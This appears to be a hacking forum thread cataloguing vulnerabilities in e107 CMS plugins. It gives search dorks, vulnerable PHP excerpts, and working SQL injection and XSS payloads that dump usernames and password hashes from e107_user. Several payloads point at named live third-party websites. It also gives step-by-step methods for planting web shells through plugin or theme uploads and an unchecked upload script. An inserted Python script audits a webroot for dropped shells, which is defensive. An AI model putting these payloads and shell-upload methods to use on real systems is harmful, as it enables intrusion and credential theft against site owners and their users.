AutoGallery v3.1_beta [downloaded]
Google dork: inurl:e107_plugins/autogallery (Results 1 - 10 of about 132,000)

Path disclosure in the help file:
http://e107/e107_plugins/autogallery/help.php

Path disclosure (send the request without parameters!):
http://e107/e107_plugins/autogallery/xmlplaylist.php
http://e107/e107_plugins/autogallery/editaction.php

Passive XSS in e107_plugins/autogallery/arcade.php
PHP:
....
// Do different things when the flash game gives different requests
$sessdo = $_POST['sessdo'];
if ($sessdo != '') {
    // Session start to get the game name - $title
    $microone = $_POST['microone'];
    $score    = $_POST['score'];
    $gametime = $_POST['gametime'];
    // Keep feeding that flash!
    switch($sessdo) {
        case 'sessionstart':
            // Give it some random crap it doesn't really need (the initbar figure and lastid)
            // $gametime is echoed back unescaped
            echo "&connStatus=1&gametime=$gametime&initbar=6Z4&lastid=6&val=x";
            exit;
            break;
        // Give it permission for... no apparent reason
        case 'permrequest':
            // Notice $microone = $score; -__VERY IMPORTANT__
            $microone = $score;
            echo "&validate=1&microone=$microone";
            exit;
            break;
...

Target / Result (send a POST!):
sessdo=sessionstart
gametime=<script>alert(/XSS/)</script>
or
sessdo=permrequest
microone=<script>alert(/XSS/)</script>

<form action="http://[host]/[path]/e107_plugins/autogallery/arcade.php" method="POST">
<input type=text name=sessdo value=sessionstart><br>
<input type=text name=gametime value='<script>alert(/XSS/)</script>'><br>
<input type=submit value=Submit>
</form>
aa_meetings v1.1 [download]
SQL injection in /e107_plugins/aa_meetings/geocode.php
PHP:
...
// Select all the rows in the markers table
$query = "SELECT * FROM ".MPREFIX."aam_meetings WHERE 1";
if ($_GET['MeetingID'])
    $query .= " and MeetingID=".$_GET['MeetingID'];   // raw GET value concatenated into the query
else
    $query .= " and (Lat is null or Lng is null)";
$result = mysql_query($query);
if (!$result) {
    die("Invalid query: " . mysql_error());   // DB error text is printed
}
...
Result:
http://ovdpohe.sk/e107_plugins/aa_meetings/geocode.php?MeetingID=1+or+%28select+1+from+%28select%20count%280%29%20from%20e107_user%20group%20by%20concat%28user_password%20,0x3a,floor%28rand%280%29*2%29%29%29x%29--
Roster by Carl Taylor, Version 2.0
Google dork: inurl:/e107_plugins/roster
Blind SQL injection in [path]/e107_plugins/roster/userinfo.php
PHP:
...
//html file
require_once("html/roster_userinfo.php");
$html = new userinfo_html;
switch($_GET['action']){
    default:
        $text = $html->uinfo_show($_GET['m_id']);
}
...

[path]/e107_plugins/roster/html/roster_userinfo.php
PHP:
...
Class userinfo_html {
    function uinfo_show($m_id) {
        global $sql;
        // get the member
        $member_q = $sql->db_Select("roster_members", "*", "roster_member_id='".$m_id."'");
        $member_a = $sql->db_Fetch(MYSQL_ASSOC);
        $rank = explode(",", $member_a['roster_member_rank']);
        $enlisted = date("dMY", $member_a['roster_member_enlisted']);
        $enlisted = strtoupper($enlisted);
        $patterns[0] = "/JUN/";
        $patterns[1] = "/JUL/";
...

[path]/e107_handlers/mysql.class.php
PHP:
...
function db_Select($table, $fields = '*', $arg = '', $mode = 'default', $debug = FALSE, $log_type = '', $log_remark = '') {
    global $db_mySQLQueryCount;
    $table = $this->db_IsLang($table);
    $this->mySQLcurTable = $table;
    if ($arg != '' && $mode == 'default') {
        if ($this->mySQLresult = $this->db_Query('SELECT '.$fields.' FROM '.MPREFIX.$table.' WHERE '.$arg, NULL, 'db_Select', $debug, $log_type, $log_remark)) {
            $this->dbError('dbQuery');
            return $this->db_Rows();
        } else {
            $this->dbError("db_Select (SELECT $fields FROM ".MPREFIX."{$table} WHERE {$arg})");
            return FALSE;
        }
    } elseif ($arg != '' && $mode != 'default') {
        if ($this->mySQLresult = $this->db_Query('SELECT '.$fields.' FROM '.MPREFIX.$table.' '.$arg, NULL, 'db_Select', $debug, $log_type, $log_remark)) {
            $this->dbError('dbQuery');
            return $this->db_Rows();
        } else {
            $this->dbError("db_Select (SELECT {$fields} FROM ".MPREFIX."{$table} {$arg})");
            return FALSE;
        }
    } else {
        if ($this->mySQLresult = $this->db_Query('SELECT '.$fields.' FROM '.MPREFIX.$table, NULL, 'db_Select', $debug, $log_type, $log_remark)) {
            $this->dbError('dbQuery');
            return $this->db_Rows();
        } else {
            $this->dbError("db_Select (SELECT {$fields} FROM ".MPREFIX."{$table})");
            return FALSE;
        }
    }
}
...

PHP:
...
function dbError($from) {
    if ($error_message = @mysql_error()) {
        if ($this->mySQLerror == TRUE) {
            message_handler('ADMIN_MESSAGE', '<b>mySQL Error!</b> Function: '.$from.'. ['.@mysql_errno().' - '.$error_message.']', __LINE__, __FILE__);
            return $error_message;
        }
    }
}
...

Unfortunately, error output from the DBMS is disabled:
PHP:
function db_Connect($mySQLserver, $mySQLuser,$mySQLpassword, $mySQLdefaultdb)
...
$this->mySQLerror = FALSE;
...

Result:
http://[host]/[path]/e107_plugins/roster/userinfo.php?m_id=1'+and+substring(version(),1,1)=5--+
Content is displayed!
http://[host]/[path]/e107_plugins/roster/userinfo.php?m_id=1'+and+substring(version(),1,1)=4--+
Content is not displayed!
Condition: mg=off

roster_sql.php - this plugin's table structure is in that script, without descriptors!
Path disclosure - http://[host]/[path]/e107_plugins/roster/log/userclass2.php
I misspoke ): In the post above it is not a blind injection, but an injection with printable (displayed) columns!
SQL injection
Google dork: inurl:/e107_plugins/roster
Condition: mg=off
And here is the proof:
http://www.10thsfg.org/e107_plugins/roster/userinfo.php?m_id=-5%27+union+select+1,2,3,4,5,6,7,8,user_password%20,10,11,12,13,14,15,16,user_loginname,18+from+e107_user--+
Social Shop v1.1 by eleljrk [download]
Google dork: inurl:e107_plugins/social_shop/
SQL injection in [path]/e107_plugins/social_shop/shop.php
PHP:
...
elseif($_GET['product']) {
    // $_GET['product'] goes straight into the WHERE clause
    $storedb->db_Select("ss_products","*", "product_id='".$_GET['product']."'");
    while($store_row = $storedb -> db_Fetch()) {
        if($store_row['product_approve'] == 0 && !ADMIN) {
            $ns->tablerender(SS_ERROR , "<div align='center'>".SS_ERRORMASSAGE."<a href='".e_SELF."?page=home'>".$pref['ss_store_name']."</a></div>".$credits);
            require_once(FOOTERF);
            exit;
        } else {
            $store_user = get_user_data($store_row['product_releaser']);
            $filesize = round((filesize("store/".$store_row['product_product']) / 1024));
            $product_description = str_replace("\n" ,"<br />" , $store_row['product_description']);
            $store...
Result:
http://[host]/[path]/e107_plugins/social_shop/shop.php?product=-1'+union+select+1,concat_ws(0x3a,user_loginname,user_password),3,4,5,6,7,8,9,10,11,12,13,14+from+e107_user--+
Condition: mg=off
Survey_46.zip v0.47 by yvalni [download]
Google dork: inurl:e107_plugins/survey (Results 1 - 10 of about 7,430)
SQL injection in [path]/e107_plugins/survey/survey.php
PHP:
...
if($_POST['submit']){
    $cnv = new convert;
    $mailto_addresses = "";
    $submit_time = time();
    $mailtext = LAN_SUR42.": ".$cnv -> convert_date($submit_time,"long")."\n\n";
    // $_POST['survey_id'] is interpolated into the WHERE clause unescaped
    $sql -> db_Select("survey","*","survey_id='{$_POST['survey_id']}' ");
    if($row = $sql -> db_Fetch()){
        extract($row);
    }
    if($survey_class != e_UC_PUBLIC && $survey_once){
        if(already_voted($survey_user)){
            $ns -> tablerender("Error - {$survey_name}",LAN_SUR2);
            require_once(FOOTERF);
            exit;
        }
    }
...
The most interesting part is that you don't even need to know survey_id: the data comes out together with the error (there is a printable field!).
Result:
<form action="http://[host]/[path]/e107_plugins/survey/survey.php" method=post>
<input type=text name=survey_id value="-2' union select 1,concat_ws(0x3a,user_loginname,user_password ),3,4,5,6,7,8,9,10,11,12,13,14 from e107_user limit 0,1-- ">
<input type=submit name=submit>
</form>
Condition: mg=off
Registration v0.9 by holiday [download]
SQL injection in ORDER BY (there is error output from the DBMS!)
Google dork: inurl:e107_plugins/registration

[path]/e107_plugins/registration/playerlist.php
PHP:
require_once("../../class2.php");
//@include_once e_PLUGIN.'registration/languages/'.e_LANGUAGE.'.php';
@include_once e_PLUGIN.'registration/languages/Deutsch.php';
require_once("cRegistration.php");
require_once(HEADERF);
$title=sprintf("%s - %s",REG_MAIN_2, cTournament::getInstance()->getActualTournament() );
// $_REQUEST['order'] ends up in ORDER BY
$ns->tablerender($title, cRegistration::getInstance()->showRegisteredUser($_REQUEST['order']));
require_once(FOOTERF);

[path]/e107_plugins/registration/Cregistration.php
PHP:
....
public function showRegisteredUser($order=""){
    $config = cConfig::getInstance()->getConfiguration();
    $data=$this->getAllParcipitants($order);
    $border=sprintf("border:0;border-bottom: #444 1px solid;");
    $padding1=sprintf("padding-right: 1em");
    $table.=sprintf("<table align=left style='width:95%%;margin-left:10px;border-collapse:collapse;%s; background:none;'>",$border);
    $table.=sprintf("<tr>");
...

PHP:
...
protected function getAllParcipitants($order){
    try {
        global $tp, $sql;
        // the ordering is always supplemented by surname, first name
        if(empty($order))$order="reg_name, reg_vorname";
        else $order.=', reg_name, reg_vorname';
        $data=array();
        $this->debug("DB select {$this->table}");
        $tid=cTournament::getInstance()->getActualTournamentId();
        $result=$sql->db_Select("teilnehmer", "*" , "WHERE reg_tournamentId=$tid ORDER BY $order ", "");
        if(!$result) {
            // DB error number and message are thrown, and thus displayed
            $error=sprintf("DB Error %s: %s", mysql_errno(), mysql_error());
            if(mysql_errno()>0) throw new Exception ($error);
            $this->debug("Kein Datenbankeintrag gefunden");
        }
        //$teilnehmer=array();
        while($row = $sql->db_Fetch()) {
...

Result:
http://[host]/[path]/e107_plugins/registration/playerlist.php?order=1,(select 1 from (select count(0),concat_ws(0x3a,(select user_loginname from e107_user limit 0,1),(select user_password from e107_user limit 0,1),floor(rand(0)*2)) from (select 1 union select 2 union select 3)x group by 2)a)

PS
1) Better to drive it via POST!
2) http://[host]/[path]/e107_plugins/registration_sql.php - the plugin's table structure!
Map Me! v1.3 by rickey911 [download]
SQL injection
Google dork: inurl:/e107_plugins/mapme
[path]/e107_plugins/mapme/mapmejs.php
PHP:
...
require_once("../../class2.php");
// Get language file (assume that the English language file is always present)
$lan_file = e_PLUGIN."mapme/languages/".e_LANGUAGE.".php";
include_lan($lan_file);
header("Content-type: application/x-javascript");
global $pref, $user;
$uid = $_GET['u'];   // used unquoted and unescaped in the query below
$sql->mySQLresult = @mysql_query("SELECT ".MPREFIX."gmarkers.loc, ".MPREFIX."gmarkers.lat, ".MPREFIX."gmarkers.lng, ".MPREFIX."user.user_name, ".MPREFIX."user.user_image FROM `".MPREFIX."gmarkers`, ".MPREFIX."user where ".MPREFIX."gmarkers.user_id = ".$uid." and ".MPREFIX."gmarkers.user_id = ".MPREFIX."user.user_id");
$rows=$sql->db_Rows();
if($rows){
    $row = $sql->db_Fetch();
    if($row['user_image']){
        require_once(e_HANDLER."avatar_handler.php");
        $uimage = "<img src='".avatar($row['user_image'])."' alt='".$row['user_name']."' style='text-align:middle' />";
    }
    else{
        $uimage = "<img src='".e_PLUGIN."mapme/images/noavatar.gif' alt='".$row['user_name']."' style='text-align:middle' />";
    }
    $html = "\"<div style='width:250px;'><div style='float:left; text-align:left;'>".$uimage."</div><div style='float:left; text-align:left;'><a href='".e_BASE."user.php?id.".$uid."' title='".$row['user_name']."'><b>".$row['user_name']."</b></a><br>".MAPME_JS_001." ".$row['user_name']." ".MAPME_JS_002." ".$row['loc']."."; 
    if($uid==USERID){
        $html .="<br><br><span class='smalltext'><a href='".e_PLUGIN_ABS."mapme/mapconfig.php'>".MAPME_JS_003."</a></span>"; // bugfix by nlstart
    }
...
Result, and no conditions:
http://[host]/[path]/e107_plugins/mapme/mapmejs.php?u=-1+union+select+1,2,3,concat_ws(0x3a,user_loginname,user_password),5+from+e107_user--+
PS I'll be writing exploits in Perl soon, once I recover ):
Tabbed Menu v2.0 by KVN [download]
Google dork: inurl:e107_plugins/tabbed_menu
Passive XSS
Code:
http://[host]/[path]/e107_plugins/tabbed_menu/ajaxhandler.php?target=<script>alert(123)</script>

[path]/e107_plugins/tabbed_menu/ajaxhandler.php
PHP:
...
}else{
    // $_GET['target'] is reflected into the response unescaped
    $ajax_response = "<menu_name>{$_GET['target']}</menu_name><source_id>$ajax_source</source_id><arg>$ajax_arg</arg> <b>No Data Available</b>";
}
echo $ajax_response;

Path disclosure:
Code:
http://[host]/[path]/e107_plugins/tabbed_menu/ajaxhandler.php?source=1
AACGC BFBC2 Stats v1.3 by ~M@CH!N3~ [download]
Second-order injection
Google dork: inurl:e107_plugins/aacgc_bfbcstats
[path]/e107_plugins/aacgc_bfbcstats/Member_Details.php
PHP:
...
require_once("../../class2.php");
require_once(HEADERF);
if (e_QUERY) {
    $tmp = explode('.', e_QUERY);
    $action = $tmp[0];
    $sub_action = $tmp[1];
    $id = $tmp[2];
    unset($tmp);
}
if ($pref['bfbc_enable_gold'] == "1"){$gold_obj = new gold();}
//---------------------------------------------------------------
$title .= "Battlefield Bad Company 2 Member Details";
//---------------------------------------------------------------
// first query: $sub_action is used unquoted
$sql ->db_Select("user_extended", "*", "WHERE user_extended_id=$sub_action","");
$row = $sql->db_Fetch();
// second query: the value returned by the first query is used quoted but unescaped
$sql2 ->db_Select("user", "*", "WHERE user_id='".$row['user_extended_id']."'","");
$row2 = $sql2->db_Fetch();
if ($pref['bfbc_enable_gold'] == "1"){ $username = "".$gold_obj->show_orb($row2['user_id'])."";}
else {$username = "".$row2['user_name']."";}
if ($pref['bfbc_enable_avatar'] == "1"){
    if ($row2['user_image'] == "") {$avatar = "";}
    else {
        $useravatar = $row2[user_image];
        require_once(e_HANDLER."avatar_handler.php");
        $useravatar = avatar($useravatar);
        $avatar = "<img src='".$useravatar."' width=".$pref['bfbc_avatar_size']."px></img>";
    }
}
$bfbcname = $row['user_bfbc2'];
//------------------------------------------------------
$text .= "<table style='width:100%' class=''>";
$text .= " <tr> <td bgcolor='#000000'><center><img src='".e_PLUGIN."aacgc_bfbcstats/images/bfbc2banner.jpg'></img></center></td> </tr>";
...

Result: we hex-encode this:
Code:
' union select 1,concat_ws(user_loginname,':',user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from e107_user limit 0,1-- 
Code:
http://host//path/e107_plugins/aacgc_bfbcstats/Member_Details.php?.1%20and%200%20union%20select%200x2720756e696f6e2073656c65637420312c636f6e6361745f777328757365725f6c6f67696e6e616d652c273a272c757365725f70617373776f7264292c332c342c352c362c372c382c392c31302c31312c31322c31332c31342c31352c31362c31372c31382c31392c32302c32312c32322c32332c32342c32352c32362c32372c32382c32392c33302c33312066726f6d20653130375f75736572206c696d697420302c312d2d20,2

Path disclosure:
http://[host]/[path]/e107_plugins/aacgc_bfbcstats/kits.php
http://[host]/[path]/e107_plugins/aacgc_bfbcstats/general.php
http://[host]/[path]/e107_plugins/aacgc_bfbcstats/teams.php
http://[host]/[path]/e107_plugins/aacgc_bfbcstats/BFBC2_menu.php

PS
- replace "+" with " ";
- don't forget about a shell through the second query.
Advanced Ranking and Medal System v1.5 by MikeNL (21:44 31-Jan-10) [download]
SQL injection
Google dork: inurl:e107_plugins/advmedsys
[path]/e107_plugins/advmedsys/advmedsys_view.php
PHP:
...
require_once("../../class2.php");
require_once(HEADERF);
//-----------------------------------------------------------------------------------------------------------+
//-----------------------------------------------------------------------------------------------------------+
if (e_QUERY) {
    $tmp = explode('.', e_QUERY);
    $action = $tmp[0];
    $sub_action = $tmp[1];
    $id = $tmp[2];
    unset($tmp);
}
$lan_file = e_PLUGIN."advmedsys/languages/".e_LANGUAGE.".php";
require_once(file_exists($lan_file) ? $lan_file : e_PLUGIN."advmedsys/languages/English.php");
//-----------------------------------------------------------------------------------------------------------+
if ($action == "main" || $action == "") {
...

PHP:
...
if ($action == "det") {
    $width = "width:100%";
    $text .= "
    <div style='text-align:center'>
    <br><a href='advmedsys_view.php'><center>[ ".AMS_VIEW_S9." ]</center></a><br>
    <table style='".$width."' class='fborder' cellspacing='0' cellpadding='0'>
    <tr>
    <td style='width:80px' class='forumheader3'><center>".AMS_VIEW_S1."</td>
    <td style='width:100%' class='forumheader3'>".AMS_VIEW_S2."</td>
    </tr>";
    // $sub_action (second part of e_QUERY) goes into the query unquoted
    $sql->db_Select("advmedsys_medals", "*", "WHERE medal_id = $sub_action","");
    $row = $sql->db_Fetch();
    $text .= "
    <tr>
    <td style='width:80px' class='forumheader3'><img src='medalimg/".$row['medal_pic']."' alt = '".AMS_VIEW_S1."'></img></td>
    <td style='width:100%; vertical-align:middle' class='forumheader3'>".$row['medal_name']."</td>
    </tr>
    </table>
    <br></br>
...
Further down the code there is a second-order injection.

Result:
http://[host]/[path]/e107_plugins/advmedsys/advmedsys_view.php?det.1 and 0 union select 1,2,3,concat_ws(0x3a,user_loginname,user_password) from e107_user
http://[host]/[path]/e107_plugins/advmedsys/advmedsys_view.php?det.1 and 0 union select 1,concat_ws(0x3a,user_loginname,user_password),3,4 from e107_user limit 0,1
Example:
http://www.truescap.com/e107_plugins/advmedsys/advmedsys_view.php?det.1/*! and 0 union select 1,2,3,concat_ws(0x3a,user_loginname,user_password) from e107_user*/
How to upload a shell through the admin panel.

Method 1.
If e107_admin/ contains filetypes.php, then plugins can be installed! By default this file is named filetypes_.php, i.e. uploading is not possible. In that case you get this message:
An error has occurred, unable to un-archive the file PCLZIP extract error: 'PCLZIP_ERR_MISSING_FILE (-4)'
But if filetypes.php is there, take a madnet shell (or wso etc., so as not to offend anyone! ^_^), download any plugin (any at all!), unpack it, stuff our shell in there, zip it back up, and install the plugin. I tried it on Spam Cleaner v1.0 by martinj - 2.7 KB in size [downloaded from here], and if nothing like mod_security blocks it:
http://[host]/[path]/e107_plugins/spamcleaner/our_shell.php

Method 2.
The same, but through installing a new theme in the admin panel: Theme Manager -> Upload Theme.
http://[host]/[path]/e107_themes/mew_team/our_shell.php

PS
1. Tested on the latest build!
2. Share your upload methods! ):

upd
Method 3.
Through a buggy plugin, if there is one.

How to upload a shell (without admin rights!).
Method 1: a buggy plugin.
Eh, a tasty hole! A plugin from 2009, downloaded from here.
Google dork: inurl:e107_plugins/radio_plan/
http://[host]/[path]/e107_plugins/radio_plan/admin/upload.php
PHP:
...
include "../configuration.php";
include "../includes/functions.inc.php";
if($_FILES){
    // the uploaded file is moved as-is, original name and all, under ../images/<target>/
    if(move_uploaded_file($_FILES['pic']['tmp_name'], '../images/' . get('target') . '/' . $_FILES['pic']['name'])){
        echo "Upload erfolgreich";
        $image_path = '../images/' . get('target') . '/';
        // resize the images
        //$act_image = $_FILES['pic']['name'];
        // $image_parts = explode('.', $act_image, -1);
        // $image_name = $image_parts[0];
        // $image_parts = explode('.', $act_image);
        // $image_ext = array_pop($image_parts);
        //
        // $full_image = $image_name . '.full.' . $image_ext;
        // $thumb_image = $image_name . '.thumb.' . $image_ext;
        //
        // image_resize($image_path . $act_image, $image_full_width, $image_full_height, $image_path . $full_image, $image_ext);
        // image_resize($image_path . $act_image, $image_thumb_width, $image_thumb_height, $image_path . $thumb_image, $image_ext);
        //
        // unlink($image_path . $act_image);
    }
    else echo "Upload fehlgeschlagen";
...

[path]/e107_plugins/radio_plan/includes/functions.inc.php
PHP:
...
function get($var, $flag = ''){
    $let_get = TRUE;
    if(strpos("/POST", $var) === FALSE){
        $let_get = FALSE;
        $var = ereg_replace("/POST", "", $var);
    }
    if(isset($_POST[$var])) return $_POST[$var];
    else if(isset($_GET[$var]) && $let_get == FALSE) return $_GET[$var];
    else if(isset($_FILES[$var][$flag]) && $let_get == FALSE) return $_FILES[$var][$flag];
    else return FALSE;
}
...

When I uploaded the shell locally I got an error, but I realized that I have PHP Version 5.3.1, and it is connected with this:
I replaced it with:
PHP:
$var = preg_replace("@/POST@", "", $var);
Hooray ):
http://[host]/[path]/e107_plugins/radio_plan/images/our_sell.php

PS Nothing needs to be changed on the target. Forgot to mention: no need to send a POST, a file upload form is displayed right away when you access the upload.php script ):
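The two posts above describe three places a dropped shell ends up: inside a plugin or theme zip installed through the admin panel (which works only when e107_admin/filetypes.php exists instead of the default filetypes_.php), and under an image directory written by an unchecked upload script such as radio_plan/admin/upload.php. An added example in Python (mine, not code from this thread or from e107) that turns those observations into a post-incident check over an e107 webroot. The list of media directories and the idea of a baseline (the file list of a clean copy of the same e107 version, supplied by the caller) are assumptions of this example.

```python
import os
from pathlib import PurePosixPath

# Added example, not code from the thread or from e107. Flags the three upload
# paths described in the posts: filetypes.php present (zip install enabled),
# PHP under media directories, and PHP files absent from a known-good baseline.
UPLOAD_DIRS = {"images", "files", "store", "upload", "uploads", "avatars"}  # assumed list
PHP_EXT = {".php", ".php3", ".php4", ".php5", ".phtml"}


def audit_paths(paths, baseline=None):
    """Pure check over webroot-relative POSIX paths; returns (kind, path) findings.

    baseline, if given, is a set of paths from a clean install of the same version:
    any PHP file not in it is reported as 'new-php'.
    """
    findings = []
    for p in paths:
        pp = PurePosixPath(p)
        parts = pp.parts
        if not parts:
            continue
        is_php = pp.suffix.lower() in PHP_EXT
        # admin plugin/theme upload is enabled when this file carries its live name
        if parts == ("e107_admin", "filetypes.php"):
            findings.append(("upload-enabled", p))
        # a PHP file inside images/ etc. of a plugin or theme is never legitimate
        if is_php and parts[0] in ("e107_plugins", "e107_themes") and UPLOAD_DIRS & set(parts[1:-1]):
            findings.append(("php-in-upload-dir", p))
        # e.g. our_shell.php packed into an otherwise genuine plugin zip
        if is_php and baseline is not None and p not in baseline:
            findings.append(("new-php", p))
    return findings


def audit_webroot(root, baseline=None):
    """Walk an e107 webroot on disk and run audit_paths over every file."""
    paths = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            rel = os.path.relpath(os.path.join(dirpath, name), root)
            paths.append(rel.replace(os.sep, "/"))
    return audit_paths(sorted(paths), baseline)


if __name__ == "__main__":
    import sys
    for kind, path in audit_webroot(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{kind:20} {path}")
```

Point it at the webroot (`python audit.py /var/www/e107`) and diff the output against expectations; without a baseline it still reports the first two kinds, which need no reference copy.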
Alternate Profiles, downloaded from here.
Google dork: inurl:e107_plugins/alternate_profiles
./e107_plugins/alternate_profiles/db_upgrade.php
PHP:
...
if(isset($_GET['con'])) {
    $start = $_GET['start'];
    $end = $_GET['end'];
    // start and end go straight into LIMIT
    $query = mysql_query("SELECT * FROM ".MPREFIX."alternate_profiles LIMIT $start,$end");
    $rows = mysql_num_rows($query);
    if (isset($_GET['count'])) {
        $count = $_GET['count'];
        $first = $_GET['start'] - 2;
        // $count is echoed unescaped
        echo "Users #".$first." to #".$count." have been updated.<br/>";
    } else {
...

PHP:
...
$split = explode("[||]",$row['user_custompage']);
if ($split[0] == "0019283") {
    $array = Array();
    $array['Mood'] = $split[1];
    $array['Status'] = $split[2];
    $array['Orientation'] = $split[3];
    $array['Hometown'] = $split[4];
    $array['Ethnicity'] = $split[5];
    $array['Occupation'] = $split[6];
    $array['Music'] = $split[7];
    $array['Films/Television'] = $split[8];
    $array['Favourite_Books'] = $split[9];
    $array['aboutme'] = $split[10];
    $db = serialize($array);
    mysql_query("UPDATE ".MPREFIX."alternate_profiles SET user_custompage='".$db."', user_simple='1' WHERE user_id=".$row['user_id']." ");
    unset($array);
    $count++;
    echo "Updated user #".$row['user_id']."<br/>";
} else {
    mysql_query("UPDATE ".MPREFIX."alternate_profiles SET user_simple='0' WHERE user_id=".$row['user_id']." ");
}
...

Result:
Passive XSS
http://[host]/[path]/e107_plugins/alternate_profiles/db_upgrade.php?con&start=0&end=1&count=<script>alert(123)</script>

Blind SQL injection
To drive it, you need to stuff 0019283[||] into the result of the first query; obviously better to hex it, to get around the quotes ):
Say it is version 5:
http://[host]/[path]/e107_plugins/alternate_profiles/db_upgrade.php?con&start=0&end=1 union select 1,0x303031393238335b7c7c5d27,3,4,5,6,7,8,9,10,11 from (select 1 union select 2 union select 3)x where substring(version(),1,1)=5
A total of 1 profiles have been upgraded - true
http://[host]/[path]/e107_plugins/alternate_profiles/db_upgrade.php?con&start=0&end=1 union select 1,0x303031393238335b7c7c5d27,3,4,5,6,7,8,9,10,11 from (select 1 union select 2 union select 3)x where substring(version(),1,1)=4
A total of 0 profiles have been upgraded - false
Plus: no conditions.
Google dork: inurl:e107_plugins/rank_system/recommend.php
Target: http://[host]/[path]/e107_plugins/rank_system/recommend.php
Passive XSS in /e107_plugins/rank_system/recommend.php
PHP:
...
$recomm = new recommend();
if (isset($_POST['nextstep']) ) {
    $recomm_action = $_POST['recomm_action'];
} else {
    $recomm_action = "";
}
...

PHP:
....
else if ($recomm_action == 'submit') {
    $type = intval($_POST['recomm_type']);
    $target = intval($_POST['recomm_target']);
    $t_name = $_POST['t_name'];   // not filtered, unlike the fields around it
    $r_for = intval($_POST['recomm_for']);
    $r_remarks = $tp->toDB($_POST['recomm_remarks']);
    if ($recomm->submitRecomm($target, $type, $r_for, $r_remarks)) {
        $msg = RANKS_RM_11;
    } else {
        $msg = RANKS_RM_12;
    }
    $rank_text .= '
    <table class="rsborder" style="' . USER_WIDTH . '">
    <tr>
    <td class="rscaption" style="text-align:left">' . RANKS_RM_01 . ' [' . $t_name .']</td>
...

Result (set via POST!):
nextstep = any value
recomm_action=submit
t_name= xss
PS It only works for an authenticated user!
e107 vulnerabilities kind of don't belong in public...
Dork: intext:This site is powered by e107
e107 Version 0.7.20
Passive XSS
Vulnerable file: /e107_files/thumb.php
PHP:
require_once("../class2.php");
require_once(e_HANDLER."resize_handler.php");
if (e_QUERY) {
    $tmp = explode('+',rawurldecode(e_QUERY));
    if(strpos($tmp[0], '/') === 0 || strpos($tmp[0], ":") >= 1) {
        $source = $tmp[0];   // Full path to image specified
    } else {
        $source = "../".str_replace('../','',$tmp[0]);
    }
    if (!$source) {
        echo "No image name.<br />";
        exit;
    }
    $newsize = intval($tmp[1]);
    if (($newsize < 5) || ($newsize > 4000)) {   // Pretty generous limits
        echo "Bad image size: {$newsize}<br />";
        exit;
    }
    $opts = varset($tmp[2],'upsize');
    if(!resize_image($source, 'stdout', $newsize, $opts)) {
        echo "Couldn't find: {$source}<br />";   // $source is echoed back unescaped
    }
}
Exploit:
http://[host]/[path]e107_files/thumb.php?1e107_files/thumb.php?<script>alert(123)</script>%2b5
PS Tested on the very latest 0.7.21. Keep digging into the engine, whoever feels like it!
Can anyone suggest vulnerabilities in core 0.7.17? Starting with this version, patches for some vulnerabilities were released (no idea which ones). Breaking in through plugins is impossible, since the only plugin in use is guestbook.
eBattles Version 0.7.229 (other versions not tested)
No dependencies.
Passive XSS
\e107_v0.7.16_full\e107_plugins\ebattles\clanmanage.php
PHP:
/* Clan Name */
$clan_id = $_GET['clanid'];
if (!$clan_id) {
    header("Location: ./clans.php");
    exit();
} else {
Result:
http://localhost/e107_v0.7.16_full/e107_plugins/ebattles/clanmanage.php?clanid=1"><script>alert(document.cookie)</script>

\e107_v0.7.16_full\e107_plugins\ebattles\eventinfo.php
PHP:
$event_id = $_GET['eventid'];
if (!$event_id) {
    header("Location: ./events.php");
    exit();
} else {
Result:
http://localhost/e107_v0.7.16_full/e107_plugins/ebattles/eventinfo.php?eventid=1"><script>alert(document.cookie)</script>

Off Site:
Code:
http://ebattles.freehostia.com/e107_plugins/ebattles/eventinfo.php?eventid=31"><script>alert(document.cookie)</script>
MyBlogs Version 0.72
Passive XSS
\e107_plugins\myblog_menu\myblog.php
Result:
http://localhost/e107_plugins/myblog_menu/myblog.php?a=profile&s=newpost
Fields: Text, Caption, Tags

Active XSS
site.ru/e107_plugins/myblog_menu/myblog.php?a=tag
Search on tagwords: "><script>alert()</script>
Library Module v1.1
The dork is: e107_plugins/library
Not protected by htaccess:
http://[host]/[path]/e107_plugins/library/
Path disclosure:
http://[host]/[path]//e107_plugins/library/search.php
http://[host]/[path]/e107_plugins/library/help.php
http://[host]/[path]/e107_plugins/library/admin_menu.php
In the last one, admin_menu.php, there is a warning on require, and a redirect can be done there too --> but it's useless.
In library.php there is possibly an injection when mg=off.

Found a pXSS in e107_plugins/library/admin_menu.php
PHP:
$menutitle = "Virtual Library";
$butname[] = "Main Library Page";   // Admin Menu Button Name
$butlink[] = "library_conf.php";    // Admin Menu Button Link.
for ($i=0; $i<count($butname); $i++) {
    $option = "option_".$i;
    if(IsSet($_POST[$option])){
        $link = $butlink[$i];
        header("location: $link");   // $butlink can be overridden from the request when register_globals is on
        exit;
    }
}
/*...*/
HTML:
<form action="http://e107_0.7.21_full/e107_plugins/library/admin_menu.php?butlink[]=data:text/html;base64,PHNjcmlwdD5hbGVydCgxMjMpPC9zY3JpcHQ%2B" method=post>
<input name="option_0" type="hidden" value="pew">
<input type='submit'>
</form>
Well, only when rg=on. But what can I do => this plugin is ancient, apparently from 2005.
Here is an example, the very first one from the search:
<form action="http://buddhism.am/e107/e107_plugins/library/admin_menu.php?butlink[]=data:text/html;base64,PHNjcmlwdD5hbGVydCgxMjMpPC9zY3JpcHQ%2B" method=post>
<input name="option_0" type="hidden" value="pew">
<input type='submit'>
</form>